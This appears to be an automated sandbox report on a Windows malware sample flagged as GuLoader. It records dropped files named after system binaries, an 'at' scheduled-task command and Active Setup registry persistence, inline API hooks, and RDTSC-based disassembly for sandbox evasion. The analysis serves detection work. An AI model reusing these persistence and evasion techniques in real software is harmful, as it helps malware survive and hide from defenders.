Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\os9TZxfmTZ.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: Binary string: explorer.pdbUGP source: os9tzxfmtz.exe, 0000001D.00000002.353878128.000000001E6B0000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdbUGP source: os9tzxfmtz.exe, 0000001D.00000002.353360463.000000001E380000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: os9tzxfmtz.exe
Source: Binary string: explorer.pdb source: os9tzxfmtz.exe, 0000001D.00000002.353878128.000000001E6B0000.00000040.00000001.sdmp

Data Obfuscation:

Yara detected GuLoader
Source: Yara match File source: Process Memory Space: os9tzxfmtz.exe PID: 6280, type: MEMORY
Yara detected VB6 Downloader Generic
Source: Yara match File source: Process Memory Space: os9tzxfmtz.exe PID: 6280, type: MEMORY
PE file contains an invalid checksum
Source: explorer.exe.2.dr Static PE information: real checksum: 0x3b1c8 should be: 0x382ba
Source: stsys.exe.6.dr Static PE information: real checksum: 0x3b1c8 should be: 0x3988e
Source: os9TZxfmTZ.exe Static PE information: real checksum: 0x3b1c8 should be: 0x67a0c
Source: icsys.icn.exe.0.dr Static PE information: real checksum: 0x3b1c8 should be: 0x41d85
Source: spoolsv.exe.4.dr Static PE information: real checksum: 0x3b1c8 should be: 0x363c4
Source: svchost.exe.5.dr Static PE information: real checksum: 0x3b1c8 should be: 0x432a9
Source: mrsys.exe.4.dr Static PE information: real checksum: 0x3b1c8 should be: 0x3b78a
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 1_2_00405A3F push ecx; ret 1_2_00405A3D
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 1_2_0040715D push es; ret 1_2_004071DB
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 1_2_004059E4 push ecx; ret 1_2_004059E5
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 1_2_004059FB push ecx; ret 1_2_00405A3D
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 1_2_004059A0 push ecx; ret 1_2_004059D5
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 1_2_004075BC push es; retf 1_2_004075CB
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 1_2_02280076 push esp; iretd 1_2_02280077
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 1_2_022800E3 push esp; iretd 1_2_022800E4
Source: C:\Windows\System\explorer.exe Code function: 4_2_0375F124 push 423E369Ah; iretd 4_2_0375F12B
Source: C:\Windows\System\explorer.exe Code function: 4_2_0375B867 push edx; retf 4_2_0375B869
Source: C:\Windows\System\explorer.exe Code function: 4_2_03761F6E push ds; ret 4_2_03761F77
Source: C:\Windows\System\explorer.exe Code function: 4_2_03760F6C push eax; ret 4_2_03760F72
Source: C:\Windows\System\explorer.exe Code function: 4_2_03760F02 push eax; ret 4_2_03760F08
Source: C:\Windows\System\explorer.exe Code function: 4_2_03760F0B push eax; ret 4_2_03760F72
Source: C:\Windows\System\explorer.exe Code function: 4_2_03754FA6 push ebx; ret 4_2_03754FA7
Source: C:\Windows\System\explorer.exe Code function: 4_2_0375A625 push ds; retf 4_2_0375A626
Source: C:\Windows\System\explorer.exe Code function: 4_2_03760EB5 push eax; ret 4_2_03760F08
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3FD0D1 push ecx; ret 29_2_1E3FD0E4

Persistence and Installation Behavior:

Drops PE files with benign system names
Source: C:\Windows\System\spoolsv.exe File created: C:\Windows\System\svchost.exe
Source: C:\Users\user\AppData\Local\icsys.icn.exe File created: C:\Windows\System\explorer.exe
Source: C:\Windows\System\explorer.exe File created: C:\Windows\System\spoolsv.exe
Drops executables to the windows directory (C:\Windows) and starts them
Source: C:\Windows\System\svchost.exe Executable created and started: c:\windows\system\spoolsv.exe
Source: C:\Users\user\AppData\Local\icsys.icn.exe Executable created and started: c:\windows\system\explorer.exe
Source: C:\Windows\System\spoolsv.exe Executable created and started: c:\windows\system\svchost.exe
Drops PE files
Source: C:\Windows\System\spoolsv.exe File created: C:\Windows\System\svchost.exe
Source: C:\Windows\System\explorer.exe File created: C:\Users\user\AppData\Roaming\mrsys.exe
Source: C:\Users\user\AppData\Local\icsys.icn.exe File created: C:\Windows\System\explorer.exe
Source: C:\Windows\System\explorer.exe File created: C:\Windows\System\spoolsv.exe
Source: C:\Users\user\Desktop\os9TZxfmTZ.exe File created: C:\Users\user\Desktop\os9tzxfmtz.exe
Source: C:\Users\user\Desktop\os9TZxfmTZ.exe File created: C:\Users\user\AppData\Local\icsys.icn.exe
Source: C:\Windows\System\svchost.exe File created: C:\Users\user\AppData\Local\stsys.exe
Drops PE files to the windows directory (C:\Windows)
Source: C:\Windows\System\spoolsv.exe File created: C:\Windows\System\svchost.exe
Source: C:\Users\user\AppData\Local\icsys.icn.exe File created: C:\Windows\System\explorer.exe
Source: C:\Windows\System\explorer.exe File created: C:\Windows\System\spoolsv.exe
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Users\user\Desktop\os9TZxfmTZ.exe File created: C:\Users\user\Desktop\os9tzxfmtz.exe

Boot Survival:

Creates an undocumented autostart registry key
Source: C:\Windows\System\explorer.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPath
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Windows\System\svchost.exe Process created: C:\Windows\SysWOW64\at.exe at 09:01 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
Modifies existing windows services
Source: C:\Windows\System\svchost.exe Registry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess

Hooking and other Techniques for Hiding and Protection:

Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8F 0xFE 0xED
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Users\user\Desktop\os9TZxfmTZ.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Users\user\Desktop\os9TZxfmTZ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\icsys.icn.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System\spoolsv.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Source: C:\Users\user\Desktop\os9tzxfmtz.exe RDTSC instruction interceptor: First address: 000000000228872E second address: 00000000022887E6 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a xor edi, edi 0x0000000c cmp bh, bh 0x0000000e mov dword ptr [ebp+000000F8h], 00A95F60h 0x00000018 test dx, dx 0x0000001b test eax, edx 0x0000001d call 00007F6704C9B653h 0x00000022 call 00007F6704C9B5D8h 0x00000027 lfence 0x0000002a mov edx, dword ptr [7FFE0014h] 0x00000030 lfence 0x00000033 ret 0x00000034 mov esi, edx 0x00000036 pushad 0x00000037 rdtsc
Source: C:\Users\user\Desktop\os9tzxfmtz.exe RDTSC instruction interceptor: First address: 00000000022887E6 second address: 00000000022887E6 instructions: 0x00000000 rdtsc 0x00000002 xor eax, eax 0x00000004 inc eax 0x00000005 cpuid 0x00000007 popad 0x00000008 call 00007F6704CA1D08h 0x0000000d lfence 0x00000010 mov edx, dword ptr [7FFE0014h] 0x00000016 lfence 0x00000019 ret 0x0000001a sub edx, esi 0x0000001c ret 0x0000001d jmp 00007F6704CA1D2Eh 0x0000001f cmp bl, 0000006Dh 0x00000022 add edi, edx 0x00000024 dec dword ptr [ebp+000000F8h] 0x0000002a cmp dword ptr [ebp+000000F8h], 00000000h 0x00000031 jne 00007F6704CA1CB9h 0x00000033 test eax, edx 0x00000035 call 00007F6704CA1D93h 0x0000003a call 00007F6704CA1D18h 0x0000003f lfence 0x00000042 mov edx, dword ptr [7FFE0014h] 0x00000048 lfence 0x0000004b ret 0x0000004c mov esi, edx 0x0000004e pushad 0x0000004f rdtsc
Source: C:\Users\user\Desktop\os9tzxfmtz.exe RDTSC instruction interceptor: First address: 0000000002280C26 second address: 0000000002280C26 instructions:
Source: C:\Users\user\Desktop\os9tzxfmtz.exe RDTSC instruction interceptor: First address: 0000000002283F33 second address: 0000000002283F33 instructions:
Source: C:\Users\user\Desktop\os9tzxfmtz.exe RDTSC instruction interceptor: First address: 0000000002283FF5 second address: 0000000002283FF5 instructions:
Tries to detect Any.run
Source: C:\Users\user\Desktop\os9tzxfmtz.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: C:\Users\user\Desktop\os9tzxfmtz.exe File opened: C:\Program Files\qga\qga.exe
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: os9tzxfmtz.exe Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\os9tzxfmtz.exe RDTSC instruction interceptor: First address: 000000000228872E second address: 00000000022887E6 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a xor edi, edi 0x0000000c cmp bh, bh 0x0000000e mov dword ptr [ebp+000000F8h], 00A95F60h 0x00000018 test dx, dx 0x0000001b test eax, edx 0x0000001d call 00007F6704C9B653h 0x00000022 call 00007F6704C9B5D8h 0x00000027 lfence 0x0000002a mov edx, dword ptr [7FFE0014h] 0x00000030 lfence 0x00000033 ret 0x00000034 mov esi, edx 0x00000036 pushad 0x00000037 rdtsc
Source: C:\Users\user\Desktop\os9tzxfmtz.exe RDTSC instruction interceptor: First address: 00000000022887E6 second address: 00000000022887E6 instructions: 0x00000000 rdtsc 0x00000002 xor eax, eax 0x00000004 inc eax 0x00000005 cpuid 0x00000007 popad 0x00000008 call 00007F6704CA1D08h 0x0000000d lfence 0x00000010 mov edx, dword ptr [7FFE0014h] 0x00000016 lfence 0x00000019 ret 0x0000001a sub edx, esi 0x0000001c ret 0x0000001d jmp 00007F6704CA1D2Eh 0x0000001f cmp bl, 0000006Dh 0x00000022 add edi, edx 0x00000024 dec dword ptr [ebp+000000F8h] 0x0000002a cmp dword ptr [ebp+000000F8h], 00000000h 0x00000031 jne 00007F6704CA1CB9h 0x00000033 test eax, edx 0x00000035 call 00007F6704CA1D93h 0x0000003a call 00007F6704CA1D18h 0x0000003f lfence 0x00000042 mov edx, dword ptr [7FFE0014h] 0x00000048 lfence 0x0000004b ret 0x0000004c mov esi, edx 0x0000004e pushad 0x0000004f rdtsc
Source: C:\Users\user\Desktop\os9tzxfmtz.exe RDTSC instruction interceptor: First address: 0000000002288806 second address: 0000000002288806 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e xor eax, eax 0x00000010 inc eax 0x00000011 cpuid 0x00000013 bt ecx, 1Fh 0x00000017 jc 00007F6704C9BDCCh 0x0000001d popad 0x0000001e call 00007F6704C9B746h 0x00000023 lfence 0x00000026 rdtsc
Source: C:\Users\user\Desktop\os9tzxfmtz.exe RDTSC instruction interceptor: First address: 0000000002280C26 second address: 0000000002280C26 instructions:
Source: C:\Users\user\Desktop\os9tzxfmtz.exe RDTSC instruction interceptor: First address: 0000000002285908 second address: 0000000002284BD7 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b test cx, cx 0x0000000e ret 0x0000000f jmp 00007F6704C9B5EEh 0x00000011 cmp cx, bx 0x00000014 call 00007F6704C9E973h 0x00000019 mov eax, dword ptr fs:[00000030h] 0x0000001f mov eax, dword ptr [eax+10h] 0x00000022 add eax, 40h 0x00000025 add eax, 04h 0x00000028 mov eax, dword ptr [eax] 0x0000002a ret 0x0000002b mov dword ptr [ebp+4Ch], eax 0x0000002e cmp ebx, ecx 0x00000030 call 00007F6704C9F07Ch 0x00000035 push dword ptr [ebp+20h] 0x00000038 pop dword ptr [ebp+0000012Ch] 0x0000003e mov dword ptr [ebp+68h], 00000000h 0x00000045 jmp 00007F6704C9C8F0h 0x0000004a call 00007F6704C9A2C9h 0x0000004f jmp 00007F6704C9B5F2h 0x00000051 pushad 0x00000052 mov edi, 00000036h 0x00000057 rdtsc
